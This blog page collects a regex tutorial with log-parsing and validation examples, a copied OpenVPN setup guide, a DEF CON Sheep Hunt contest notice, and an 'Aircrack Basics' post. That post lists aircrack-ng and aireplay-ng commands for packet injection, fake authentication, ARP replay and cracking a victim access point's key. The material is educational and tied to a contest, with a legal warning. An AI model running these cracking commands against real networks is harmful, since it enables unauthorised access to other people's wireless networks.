Showing posts with label wall of sheep. Show all posts

2024-08-16

REGEX - Regular Expressions

What is Regex?

Regular expressions (regex) are sequences of characters that form search patterns, primarily used for string matching within texts. Regex is an essential tool in programming, data analysis, and text processing, helping to find, match, replace, or extract specific patterns of text efficiently.

Key Concepts of Regex:

  • Literals: Characters that match themselves. For example, the regex cat matches the string "cat" in the text.
  • Metacharacters: Special characters that have specific meanings in regex, such as . (dot), *, +, ?, \, ^, and $.
  • Character Classes: Enclosed in square brackets [ ], they match any one of a specific set of characters. For example, [abc] matches "a", "b", or "c".
  • Quantifiers: These specify how many times the preceding element should be matched. Examples include * (0 or more), + (1 or more), and {n} (exactly n times).
  • Anchors: ^ matches the start of a string, and $ matches the end.
  • Groups and Capturing: Parentheses () are used to group parts of a regex and capture the matched content for later use.

Top 10 Most Common Regex Patterns:

  1. Matching a Specific Word:

    • Regex: \bword\b
    • Explanation: Matches the exact word "word". The \b asserts a word boundary to ensure "word" isn't part of a larger word.
  2. Matching an Email Address:

    • Regex: \b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b
    • Explanation: Matches most common email addresses.
  3. Matching a URL:

    • Regex: https?://[^\s/$.?#].[^\s]*
    • Explanation: Matches both "http" and "https" URLs.
  4. Matching a Date (YYYY-MM-DD):

    • Regex: \b\d{4}-\d{2}-\d{2}\b
    • Explanation: Matches dates in the format of 2024-08-13.
  5. Matching a Phone Number:

    • Regex: \b\d{3}[-.]?\d{3}[-.]?\d{4}\b
    • Explanation: Matches phone numbers like 123-456-7890, 123.456.7890, or 1234567890.
  6. Matching Digits (Numbers):

    • Regex: \d+
    • Explanation: Matches one or more digits.
  7. Matching a Postal Code (US):

    • Regex: \b\d{5}(?:-\d{4})?\b
    • Explanation: Matches US postal codes like 12345 or 12345-6789.
  8. Matching a Hexadecimal Color Code:

    • Regex: #?([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})\b
    • Explanation: Matches 3 or 6 digit hex color codes like #a3c113 or #a3c.
  9. Matching Whitespace:

    • Regex: \s+
    • Explanation: Matches one or more whitespace characters, including spaces, tabs, and newlines.
  10. Matching a Specific Character Range:

    • Regex: [A-Za-z0-9]
    • Explanation: Matches any alphanumeric character (a-z, A-Z, 0-9).


Practical Uses:

  • Search and Replace: Quickly find and replace text in documents or code.
  • Validation: Validate user inputs like email addresses, phone numbers, and URLs.
  • Data Extraction: Extract relevant pieces of text, such as dates, phone numbers, or identifiers from larger texts.

Regular expressions (regex) have a wide range of practical applications across different fields, especially in programming, data analysis, and system administration. Here’s a breakdown of some of the most common practical applications:

1. Text Search and Replace

  • Application: In text editors or integrated development environments (IDEs), regex is often used for search and replace functions. For example, you might want to find all occurrences of a word and replace them with another word across an entire codebase or document.
  • Example: Replacing all instances of "HTTP" with "HTTPS" in a large set of HTML files.

2. Input Validation

  • Application: Regex is used to validate user input in forms, ensuring the data entered is in the correct format before it's processed. This is particularly common in web development.
  • Example: Validating email addresses, phone numbers, postal codes, or passwords on a website form to ensure they meet specific criteria.

3. Data Extraction and Parsing

  • Application: Extract specific pieces of data from a larger body of text. This is useful when dealing with logs, scraping data from web pages, or processing text files.
  • Example: Extracting all dates from a document or pulling out specific fields like phone numbers or email addresses from a block of text.

4. Log Analysis

  • Application: System administrators and developers use regex to parse and analyze log files, searching for patterns that indicate errors, security breaches, or other issues.
  • Example: Searching for IP addresses or error codes in server logs to identify failed login attempts or system errors.
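
An added example (not from the original post) of the failed-login search described above, run over constructed OpenSSH-style log lines. The log format, host name and function names are assumptions for illustration, and the addresses come from documentation ranges.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample lines in OpenSSH auth-log style (not taken from the page).
SAMPLE_LOG = """\
Aug 13 09:14:02 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 52344 ssh2
Aug 13 09:14:05 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 52350 ssh2
Aug 13 09:14:09 web01 sshd[2214]: Accepted password for deploy from 198.51.100.20 port 40112 ssh2
Aug 13 09:15:41 web01 sshd[2230]: Failed password for root from 203.0.113.7 port 52391 ssh2
Aug 13 09:16:00 web01 sshd[2231]: Failed password for invalid user x from 10.0.0.1 port 22 ssh2 from 192.0.2.44 port 33010 ssh2
Aug 13 09:16:03 web01 sshd[2240]: Failed password for bob from 999.1.1.1 port 1 ssh2
"""

# The username is attacker-controlled, so the greedy (.*) plus the end anchor
# make the *last* "from <ip> port <n> ssh2" on the line the one that counts.
FAILED_LOGIN = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>.*) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def failed_logins(log_text):
    """Count failed SSH password attempts per source IPv4 address."""
    counts = Counter()
    for line in log_text.splitlines():
        match = FAILED_LOGIN.search(line)
        if not match:
            continue
        try:
            # \d{1,3} also matches 999, so let ipaddress reject bad octets.
            ip = ipaddress.IPv4Address(match.group("ip"))
        except ValueError:
            continue
        counts[str(ip)] += 1
    return counts


def noisy_sources(log_text, threshold=3):
    """Return source IPs with at least `threshold` failed attempts."""
    return sorted(ip for ip, n in failed_logins(log_text).items() if n >= threshold)


if __name__ == "__main__":
    for ip, n in failed_logins(SAMPLE_LOG).most_common():
        print(f"{ip}\t{n}")
```

The fifth sample line carries a username that imitates the log format; the pattern attributes it to 192.0.2.44, not to the address embedded in the username.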

5. Web Scraping

  • Application: When extracting data from web pages, regex can help identify and extract relevant information, such as links, headings, or other specific data points.
  • Example: Scraping prices from an e-commerce website or extracting metadata from HTML tags.

6. Data Cleaning

  • Application: In data analysis, regex is used to clean and preprocess data. This might involve removing unwanted characters, splitting strings, or standardizing formats.
  • Example: Cleaning up inconsistent phone number formats in a dataset or removing HTML tags from text data.

7. Syntax Highlighting

  • Application: IDEs and text editors use regex for syntax highlighting, where different parts of code are colored differently based on their function (e.g., keywords, variables, strings).
  • Example: Highlighting all instances of function names in a Python script or HTML tags in a web development environment.

8. Automated Testing

  • Application: Regex can be used in automated testing frameworks to verify that certain outputs match expected patterns, especially in unit tests.
  • Example: Checking that a generated string matches the expected format of an email address or URL.

9. Security Applications

  • Application: Regex can be used to identify and filter out potentially harmful input, such as SQL injection attacks or cross-site scripting (XSS) attempts, by recognizing suspicious patterns.
  • Example: Sanitizing user input to prevent injection attacks by ensuring no harmful code is passed through forms.
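
Input validation (item 2) and the filtering described in this item both depend on the pattern covering the whole input, not just part of it. The added example below (not from the original post) is based on the email, phone, postal code and date patterns from the Top 10 list and contrasts finding a pattern with validating against it; the function names and sample inputs are constructed for illustration.

```python
import re
from datetime import date

# Based on the Top 10 patterns, with the \b markers dropped (fullmatch() anchors
# the whole input) and re.ASCII set so \d means 0-9 only, not any Unicode digit.
FIELD_PATTERNS = {
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", re.ASCII),
    "phone": re.compile(r"\d{3}[-.]?\d{3}[-.]?\d{4}", re.ASCII),
    "zip": re.compile(r"\d{5}(?:-\d{4})?", re.ASCII),
    "date": re.compile(r"\d{4}-\d{2}-\d{2}", re.ASCII),
}


def found_somewhere(field, value):
    """Extraction-style check: is the pattern present anywhere in the input?"""
    return FIELD_PATTERNS[field].search(value) is not None


def is_valid(field, value):
    """Validation-style check: the entire input must be the pattern."""
    if FIELD_PATTERNS[field].fullmatch(value) is None:
        return False
    if field == "date":
        # The regex only checks shape; 2024-13-45 still needs a calendar check.
        try:
            date.fromisoformat(value)
        except ValueError:
            return False
    return True


if __name__ == "__main__":
    # Constructed inputs: clean value, value with trailing markup, impossible date.
    samples = [("zip", "12345"), ("zip", "12345<b>hi</b>"), ("date", "2024-13-45")]
    for field, value in samples:
        print(field, repr(value), found_somewhere(field, value), is_valid(field, value))
```

Pattern checks like these narrow what reaches the application; parameterized queries and output encoding are still what stop injection.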

10. Search Engines and Query Tools

  • Application: Search engines and query tools use regex to allow users to perform complex search queries. This is useful when you need to find specific data patterns within a large dataset or document repository.
  • Example: Searching for documents containing specific file names or patterns within a directory of files.

11. File Renaming

  • Application: Bulk renaming files based on patterns, which is useful when organizing large sets of files, such as images or documents.
  • Example: Renaming all files in a directory to include a timestamp or a specific prefix/suffix.

12. Natural Language Processing (NLP)

  • Application: Regex is used in NLP tasks to tokenize text, identify specific linguistic patterns, or clean up text data before analysis.
  • Example: Identifying and extracting hashtags or mentions from social media posts.

13. Configuration File Editing

  • Application: Regex is useful for editing configuration files programmatically, especially when you need to change specific settings across many files.
  • Example: Changing configuration parameters in multiple server files without manually editing each one.

14. Programming Languages and Frameworks

  • Application: Many programming languages, including Python, JavaScript, Perl, and others, have built-in support for regex, making it an essential tool for developers.
  • Example: Using regex in a Python script to validate input, search within files, or manipulate strings.

15. Command Line Tools

  • Application: Command line utilities like grep, sed, and awk in Unix/Linux environments use regex for powerful text processing.
  • Example: Using grep to find lines in a file that match a pattern, or sed to replace text patterns in a file.

Real-World Example:

Imagine you are managing a large database of customer records, and you need to find all entries where the email address domain is incorrect (e.g., ".con" instead of ".com"). You could use a regex to identify and correct these errors across the entire dataset quickly.

Summary:

Regex is a powerful tool that, when mastered, can significantly speed up tasks related to text processing, data validation, and pattern matching across various industries and applications. Its versatility makes it a valuable skill for developers, data scientists, system administrators, and anyone dealing with large amounts of text or data.

Learning Regex:

Regex may seem complex at first, but it's a powerful tool once mastered. Start with simple patterns and gradually move to more complex ones. There are many online tools, like regex101.com, to practice and test your regular expressions.

2018-04-06

Some Defense Against the Dark Arts.

2018.0406 Note: This post has been sitting in my draft files for a long while.  It's old but it should still be pretty significant today.  

===============

If you have ever visited the Wall of Sheep (WoS) at the Packet Hacking Village (PHV) at DEF CON and just decided to sightsee, that's all good. If you were to take away anything from that short visit, we hope you took note of the discreetly posted warnings on posters, t-shirts and stickers. Too often, media postings will say that WoS' goal is to shame unsuspecting attendees. Well, I assure you that is not the intent. The WoS mission has always been education, awareness and protection. Here are some of the messages that have been used by PHV through the years...

"SECURITY AWARENESS FOR THE FLOCK"
"Don't Get Caught Without Encryption"
"On The Air, Beware..."

With that said, let's start with the basics... at a minimum, use a VPN. The following is ripped from NordVPN's Linux install page. I do not work for NordVPN, but they do claim total anonymity, including taking payments with gift cards (Starbucks, GAP, Old Navy, etc.). There are free VPN services out there like VPNBook, but they did not indicate if they are logging or not.

How to connect to OpenVPN via shell:
1. Open terminal (keyboard shortcut: Ctrl + Alt + T).
2. Install OpenVPN client by entering `sudo apt-get install openvpn` (if you are requested a password, enter the password which you have used when creating your account).
3. Navigate to OpenVPN configuration directory with command `cd /etc/openvpn`
4. Download OpenVPN configuration files with command `sudo wget https://nordvpn.com/api/files/zip`
4.1. If you get `ERROR: The certificate of 'nordvpn.com' is not trusted.`, install the `ca-certificates` package with the command `sudo apt-get install ca-certificates`
5. If you do not have `unzip` package installed, download it by typing in `sudo apt-get install unzip`
6. Extract `config.zip` with command `sudo unzip zip`
7. Remove files which will be no longer used: `sudo rm zip`
8. To see the list of all available servers, simply enter `ls -al` command and it will print full configuration file list.
9. Choose a server which you would like to connect to.
10. Start OpenVPN with a chosen configuration by entering `sudo openvpn [file name]` (for example: `sudo openvpn at1.nordvpn.com.udp1194.ovpn`).
11. OpenVPN will ask you for credentials, so simply enter those in with your NordVPN account credentials.
12. You have successfully connected to VPN. To disconnect from the OpenVPN connection simply open terminal and press Ctrl + C on your keyboard.

How to connect to OpenVPN via Network Manager:

1. Open Terminal, Applications->Accessories->Terminal
2. Install network-manager-openvpn by typing in Terminal:
sudo apt-get install network-manager-openvpn-gnome
Press Enter (enter your password if it is needed).
3. You will be prompted: Do you want to continue? Y/n Type Y and hit Enter.
4. Once installation is complete, restart Network Manager by typing:
sudo restart network-manager
Press Enter.
5. Network-manager is now running. Now download the OpenVPN configuration files package (.ovpn file package) and the CA & tls-auth certificate file package (CA and TLS certificates), and extract them.
6. Click on the double arrow button at the top right of the screen and then select Edit Connections… from the drop-down.
7. You will be prompted to choose a connection type. Select Import a saved VPN configuration… and click on Create…

8. You will be prompted with a window to select a file that you would like to import. Please navigate to the folder where you have extracted the configuration files, select one of the files from the list and click Open. You can check which file corresponds to which server at our server list.
9. In the window that pops up, select the VPN tab.
GENERAL
Gateway: an IP or the hostname of the server (usually the server IP is already set in).
AUTHENTICATION
Type: Password;
User name: Your NordVPN username;
Password: Your NordVPN password;
CA Certificate: select a corresponding .crt file to the server which you are setting up, from the certificate file which you have downloaded previously.
Click on Advanced…

10. Open TLS Authentication tab.
Subject match: leave blank;
Verify peer (server) certificate usage signature: check and select Server;
Use additional TLS authentication: check;
Key file: select a corresponding .key file to the server which you are setting up, from the certificate file which you have downloaded previously;
Key direction: 1.
Click Ok and Save the configuration.

11. Now click on the double arrow button at the top right of the screen again and then select VPN connections from the drop-down.
Select the server which you have set up and click on it.

Congrats! You are connected to VPN. On NordVPN’s site you can check if the connection works well for you. Refresh the website and check if the status is shown as Secured. Until next time friends!

2017-07-27

DEFCON 25: SHEEP HUNT 2017



SHEEP HUNT 2017
The Wall of Sheep (WOS)
Packet Hacking Village (PHV)

It is time to scour the DEF CON airwaves for lost SHEEPS. Collect clues by playing and solving the different Sheep Hunt challenges.  ALL SKILL LEVELS ARE WELCOME! From n00b to 1337!

REGISTER NOW!    

GEAR NEEDED
     Laptop w/ Kali + wireless sniffing capabilities
     RF Devices - RTL-SDR, HackRFOne, UberTooth, YardStickOne…
     iPhone / Android w/ QRCode and/or RFiD scanners apps

USE OUR GEAR:

We get it! Who in their right mind would scan DEF CON’s wireless networks?  Ask a Sheep Hunt volunteer, and we’ll get you started.  (First come, First serve. Limited time use gear.)

THE SHEEP LIST

1. QR: Hunt for QRCodes and scan for clues! Earn points by deciphering the clues.  *QRCode scanner apps work in AIRPLANE MODE or with your mobile data turned off.

2. NFC: Hunt for NFC tags hidden in the PHV, the Wall of Sheep, or on PHV staff.  Earn points by deciphering the clues.  *NFC scanner apps should work in AIRPLANE MODE or with your mobile data off.

3. RF: Hunt for RF beacons hidden around the DEF CON hallways. Use our military-grade RF gear.  Listen and decipher the secret messages by using RF scanners.

4. AP: Find the correct SHEEP HUNT APs and start cracking.   Every key you crack & submit earns you points.  Clues to identify the correct APs are in the QR, NFC and RF challenges.


For hints follow @wallofsheep on Twitter

Hashtag #WOSSH #PHV #WOS

DEFCON 25: Aircrack Basics


NOTE: The instructions below are for concept learning and education purposes only. It is illegal to hack an access point without the owner’s consent.

PHASE 1 – Monitor Mode

OPEN A TERMINAL WINDOW (Terminal 1)

1. Set your wireless interface to monitor mode:
airmon-ng start [interface]
2. Start monitoring the wireless traffic and save it to a file:
airodump-ng -w [filename] [interface]

PHASE 2 – Generate IVs

OPEN A SECOND TERMINAL WINDOW (Terminal 2)

1. Generate IVs (Initialization Vectors) by using “aireplay-ng”.
2. Type: aireplay-ng --help to see the syntax and switches.
3. Test the target’s ability to accept packet injection, type:
aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
- The ideal outcome is a 100% injection result.
4. List the aireplay-ng help to view the attack modes available. Be patient and creative. Here are some examples below:

Fake Authentication with target AP

Ex.1 - aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]

Ex.2 - aireplay-ng -1 6000 -o 1 -q 10 -e [vic ssid] -a [vic mac] -h [your mac] [interface]


Standard ARP-request replay

aireplay-ng -3 -b [vic mac] -h [your mac] [interface]

PHASE 3 - Cracking

OPEN A THIRD TERMINAL WINDOW (Terminal 3)
1.    Start cracking, type: aircrack-ng [filename] – Filename is the location and name of the file you are dumping from Terminal 1.

2.    Pick the target SSID to start cracking.

OR use WIFITE